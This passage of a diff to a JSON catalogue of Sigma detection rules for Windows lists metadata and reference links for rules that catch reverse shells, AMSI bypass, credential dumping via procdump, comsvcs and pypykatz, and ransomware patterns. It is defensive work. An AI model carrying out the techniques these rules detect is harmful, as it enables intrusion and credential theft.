"creation_date": "2022/02/28", + "falsepositive": [ + "Software installers that pull packages from remote systems and execute them" + ], + "filename": "proc_creation_win_powershell_download_patterns.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70", + "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "e6c54d94-498c-4562-a37c-b469d8e9a275", + "value": "Suspicious PowerShell Download and Execute Pattern" + }, + { + "description": "Detects suspicious FromBase64String expressions in command line arguments", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/01/29", + "falsepositive": [ + "Administrative script libraries" + ], + "filename": "proc_creation_win_powershell_frombase64string.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_frombase64string.yml" + ], + "tags": [ + "attack.t1027", + "attack.defense_evasion", + "attack.t1140", + "attack.t1059.001" + ] + }, + "uuid": "e32d4572-9826-4738-b651-95fa63747e8a", + "value": "FromBase64String Command Line" + }, + { + "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_powershell_get_clipboard.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/16", + "https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ] + }, + "uuid": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", + "value": "PowerShell Get-Clipboard Cmdlet Via CLI" + }, + { + "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", + "meta": { + "author": "Max Altgelt", + "creation_date": "2022/04/06", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_powershell_public_folder.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.mandiant.com/resources/evolution-of-fin7", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_public_folder.yml" + ], + "tags": "No established tags" + }, + "uuid": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "value": "Execution of Powershell Script in Public Folder" + }, + { + "description": "Detects the Nishang Invoke-PowerShellTcpOneLine reverse shell", + "meta": { + "author": "FPT.EagleEye, wagga", + "creation_date": "2021/03/03", + "falsepositive": [ + "Administrative might use this function for checking network connectivity" + ], + "filename": "proc_creation_win_powershell_reverse_shell_connection.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", + "value": "Powershell Reverse Shell Connection" + }, + { + "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data by HAFNIUM", + "meta": { + "author": "FPT.EagleEye", + "creation_date": "2021/03/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_powershell_snapins_hafnium.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.collection", + "attack.t1114" + ] + }, + "uuid": "25676e10-2121-446e-80a4-71ff8506af47", + "value": "Exchange PowerShell Snap-Ins Used by HAFNIUM" + }, + { + "description": "Detects suspicious PowerShell invocation with a parameter substring", + "meta": { + "author": "Florian Roth (rule), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_powershell_susp_parameter_variation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "36210e0d-5b19-485d-a087-c096088885f0", + "value": "Suspicious PowerShell Parameter Substring" + }, + { + "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", + "meta": { + "author": "Sami Ruohonen, Harish Segar (improvement), Tim Shelton", + "creation_date": "2018/09/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_powershell_xor_commandline.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_xor_commandline.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1059.001", + "attack.t1140", + "attack.t1027" + ] + }, + "uuid": "bb780e0c-16cf-4383-8383-1e5471db6cf9", + "value": "Suspicious XOR Encoded PowerShell Command Line" + }, + { + "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", + "meta": { + "author": "Markus Neis, @Karneades", + "creation_date": "2018/03/06", + "falsepositive": [ + "False positives are possible, depends on organisation and processes" + ], + "filename": "proc_creation_win_powersploit_empire_schtasks.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1", + "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powersploit_empire_schtasks.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.s0111", + "attack.g0022", + "attack.g0060", + "car.2013-08-001", + "attack.t1053.005", + "attack.t1059.001" + ] + }, + "uuid": "56c217c3-2de2-479b-990f-5c109ba8458f", + "value": "Default PowerSploit and Empire Schtasks Persistence" + }, + { + "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/29", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_powertool_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", + "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html", + "https://twitter.com/gbti_sa/status/1249653895900602375?lang=en", + "https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powertool_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "a34f79a3-8e5f-4cc3-b765-de00695452c2", + "value": "PowerTool Execution" + }, + { + "description": "Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/27", + "falsepositive": [ + "Other programs that cause these patterns (please report)" + ], + "filename": "proc_creation_win_priv_escalation_via_named_pipe.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/privilege-escalation-via-named-pipe-impersonation.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_priv_escalation_via_named_pipe.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021" + ] + }, + "uuid": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "value": "Privilege Escalation via Named Pipe Impersonation" + }, + { + "description": "Detects usage of the SysInternals Procdump utility", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/16", + "falsepositive": [ + "Legitimate use of procdump by a developer or administrator" + ], + "filename": "proc_creation_win_procdump.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_procdump.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ] + }, + "uuid": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", + "value": "Procdump Usage" + }, + { + "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/11", + "falsepositive": [ + "Cases in which procdump just gets copied to a different directory without any renaming" + ], + "filename": "proc_creation_win_procdump_evasion.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1480785527901204481", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_procdump_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ] + }, + "uuid": "79b06761-465f-4f88-9ef2-150e24d3d737", + "value": "Procdump Evasion" + }, + { + "description": "Detects a process memory dump performed by RdrLeakDiag.exe", + "meta": { + "author": "Cedric MAURUGEON", + "creation_date": "2021/09/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_process_dump_rdrleakdiag.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.pureid.io/dumping-abusing-windows-credentials-part-1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_process_dump_rdrleakdiag.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "value": "Process Dump via RdrLeakDiag.exe" + }, + { + "description": "Detects process memory dump via comsvcs.dll and rundll32 using different techniques (ordinal, minidump function...etc)", + "meta": { + "author": "Florian Roth, Modexp, Nasreddine Bencherchali (update)", + "creation_date": "2020/02/18", + "falsepositive": [ + "Unlikely, because no one should dump the process memory in that way" + ], + "filename": "proc_creation_win_process_dump_rundll32_comsvcs.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/shantanukhande/status/1229348874298388484", + "https://twitter.com/pythonresponder/status/1385064506049630211?s=21", + "https://twitter.com/Hexacorn/status/1224848930795552769", + "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", + "https://twitter.com/SBousseaden/status/1167417096374050817", + "https://twitter.com/Wietze/status/1542107456507203586", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.credential_access", + "attack.t1036", + "attack.t1003.001", + "car.2013-05-009" + ] + }, + "uuid": "646ea171-dded-4578-8a4d-65e9822892e3", + "value": "Process Dump via Rundll32 and Comsvcs.dll" + }, + { + "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2022/01/04", + "falsepositive": [ + "Command lines that use the same flags" + ], + "filename": "proc_creation_win_proc_dump_createdump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", + "https://twitter.com/bopin2020/status/1366400799199272960", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ] + }, + "uuid": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", + "value": "CreateDump Process Dump" + }, + { + "description": "Detects the use of a Visual Studio bundled tool named DumpMinitool.exe", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_proc_dump_dumpminitool.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1511415432888131586?s=20&t=DvVrzeZ1OcGiWowbhPV8Lg", + "https://twitter.com/mrd0x/status/1511489821247684615", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_dumpminitool.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ] + }, + "uuid": "dee0a7a3-f200-4112-a99b-952196d81e42", + "value": "DumpMinitool Usage" + }, + { + "description": "Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_proc_dump_rdrleakdiag.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ] + }, + "uuid": "6355a919-2e97-4285-a673-74645566340d", + "value": "RdrLeakDiag Process Dump" + }, + { + "description": "Detects suspicious ways to use of a Visual Studio bundled tool named DumpMinitool.exe", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_proc_dump_susp_dumpminitool.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1511415432888131586", + "https://twitter.com/mrd0x/status/1511489821247684615", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_susp_dumpminitool.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ] + }, + "uuid": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "value": "Suspicious DumpMinitool Usage" + }, + { + "description": "Detect suspicious parent processes of well-known Windows processes", + "meta": { + "author": "vburov", + "creation_date": "2019/02/23", + "falsepositive": [ + "Some security products seem to spawn these" + ], + "filename": "proc_creation_win_proc_wrong_parent.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", + "https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/", + "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf", + "https://attack.mitre.org/techniques/T1036/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_wrong_parent.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003", + "attack.t1036.005" + ] + }, + "uuid": "96036718-71cc-4027-a538-d1587e0006a7", + "value": "Windows Processes Suspicious Parent Directory" + }, + { + "description": "Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file.", + "meta": { + "author": "frack113", + "creation_date": "2021/07/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_protocolhandler_susp_file.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_protocolhandler_susp_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", + "value": "ProtocolHandler.exe Downloaded Suspicious File" + }, + { + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth, Sreeman, FPT.EagleEye Team", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_proxy_execution_wuauclt.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://dtm.uk/wuauclt/", + "https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proxy_execution_wuauclt.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution" + ] + }, + "uuid": "af77cf95-c469-471c-b6a0-946c685c4798", + "value": "Proxy Execution via Wuauclt" + }, + { + "description": "Detects a PsExec service start", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/03/13", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_psexesvc_start.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_psexesvc_start.yml" + ], + "tags": [ + "attack.execution", + "attack.s0029", + "attack.t1569.002" + ] + }, + "uuid": "3ede524d-21cc-472d-a3ce-d21b568d8db7", + "value": "PsExec Service Start" + }, + { + "description": "Detects attempts to disable AMSI in the command line. It is possible to bypass AMSI by disabling it before loading the main payload.", + "meta": { + "author": "@Kostastsale", + "creation_date": "2022/11/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_psh_amsi_bypass_pattern_nov22.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_psh_amsi_bypass_pattern_nov22.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.execution" + ] + }, + "uuid": "4f927692-68b5-4267-871b-073c45f4f6fe", + "value": "PowerShell AMSI Bypass Pattern" + }, + { + "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/30", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_pua_defendercheck.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/matterpreter/DefenderCheck", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_defendercheck.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.005" + ] + }, + "uuid": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", + "value": "DefenderCheck Usage" + }, + { + "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/18", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_pua_seatbelt.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/GhostPack/Seatbelt", + "https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1526", + "attack.t1087", + "attack.t1083" + ] + }, + "uuid": "38646daa-e78f-4ace-9de0-55547b2d30da", + "value": "Seatbelt PUA Tool" + }, + { + "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_public_folder_parent.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/blackbyte-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_public_folder_parent.yml" + ], + "tags": "No established tags" + }, + "uuid": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", + "value": "Parent in Public Folder Suspicious Process" + }, + { + "description": "Detects the execution of the PurpleSharp adversary simulation tool", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/06/18", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_purplesharp_indicators.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/mvelazc0/PurpleSharp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_purplesharp_indicators.yml" + ], + "tags": [ + "attack.t1587", + "attack.resource_development" + ] + }, + "uuid": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "value": "PurpleSharp Indicator" + }, + { + "description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored", + "meta": { + "author": "frack113", + "creation_date": "2022/01/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_pypykatz.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/skelsec/pypykatz", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pypykatz.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "a29808fd-ef50-49ff-9c7a-59a9b040b404", + "value": "Registry Parse with Pypykatz" + }, + { + "description": "Detects python spawning a pretty tty", + "meta": { + "author": "Nextron Systems", + "creation_date": "2022/06/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_python_pty_spawn.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_pty_spawn.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", + "value": "Python Spawning Pretty TTY on Windows" + }, + { + "description": "Detects usage of the Quarks PwDump tool via commandline arguments", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_quarks_pwdump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/quarkslab/quarkspwdump", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_quarks_pwdump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "0685b176-c816-4837-8e7b-1216f346636b", + "value": "Quarks PwDump Usage" + }, + { + "description": "Adversaries may interact with the Windows Registry to gather information about credentials, the system, configuration, and installed software.", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_query_registry.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_query_registry.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012", + "attack.t1007" + ] + }, + "uuid": "970007b7-ce32-49d0-a4a4-fbef016950bd", + "value": "Query Registry" + }, + { + "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_query_session_exfil.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/MichalKoczwara/status/1553634816016498688", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_query_session_exfil.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", + "value": "Query Usage To Exfil Data" + }, + { + "description": "This command line patterns found in BlackByte Ransomware operations", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_ransom_blackbyte.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/blackbyte-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ransom_blackbyte.yml" + ], + "tags": "No established tags" + }, + "uuid": "999e8307-a775-4d5f-addc-4855632335be", + "value": "BlackByte Ransomware Patterns" + }, + { + "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_raspberry_robin_single_dot_ending_file.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_raspberry_robin_single_dot_ending_file.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", + "value": "Raspberry Robin Dot Ending File" + }, + { + "description": "Detects RDP session hijacking by using MSTSC shadowing", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/01/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_rdp_hijack_shadowing.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/kmkz_security/status/1220694202301976576", + "https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rdp_hijack_shadowing.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1563.002" + ] + }, + "uuid": "6ba5a05f-b095-4f0a-8654-b825f4f16334", + "value": "MSTSC Shadowing" + }, + { + "description": "Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_redirect_local_admin_share.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml" + ], + "tags": "No established tags" + }, + "uuid": "ab9e3b40-0c85-4ba1-aede-455d226fd124", + "value": "Suspicious Redirection to Local Admin Share" + }, + { + "description": "Detects the redirection of an alternate data stream (ADS) of / within a Windows command line session", + "meta": { + "author": "frack113", + "creation_date": "2022/02/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_redirect_to_stream.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md#atomic-test-3---create-ads-command-prompt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redirect_to_stream.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "70e68156-6571-427b-a6e9-4476a173a9b6", + "value": "Cmd Stream Redirection" + }, + { + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "meta": { + "author": "Alexander Rausch", + "creation_date": "2020/06/24", + "falsepositive": [ + "Unknown" + ], 